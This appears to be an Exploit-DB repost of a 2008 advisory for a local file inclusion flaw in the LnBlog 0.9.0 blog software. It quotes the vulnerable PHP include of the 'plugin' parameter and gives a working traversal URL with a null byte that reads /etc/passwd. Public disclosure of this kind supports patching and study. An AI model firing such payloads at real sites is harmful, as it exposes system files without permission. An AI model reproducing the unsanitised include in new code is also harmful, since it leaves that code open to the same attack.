[] NeoSense

LnBlog 0.9.0 - 'plugin' Local File Inclusion

Author: dun
type: webapps
platform: php
port: 
date_added: 2008-09-26 
date_updated: 2016-12-23 
verified: 1 
codes: OSVDB-48613;CVE-2008-4712 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comLnBlog-0.9.0.zip

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ###############################################################
 #  [ LnBlog <= 0.9.0 ]   Local File Inclusion Vulnerability   #
 ###############################################################
 #
 # Script: "LnBlog A cross-platform, file-based weblog/mini-CMS."
 #
 # Script site: http://lnblog.skepticats.com/
 # Download: http://lnblog.skepticats.com/content/download/
 #	     http://sourceforge.net/projects/lnblog/
 #
 # Vuln: http://site.com/[lnblog-0.9.0]/pages/showblog.php?plugin=../../../../../../../etc/passwd%00
 #
 #
 # Bug: ./lnblog-0.9.0/pages/showblog.php (lines: 109,110)
 #
 # ...
 #	} elseif ( isset($_GET['plugin']) ) {
 #		require_once("plugins/".$_GET['plugin'].".php");
 # ...
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ]

*******************************************************************************************

# milw0rm.com [2008-09-27]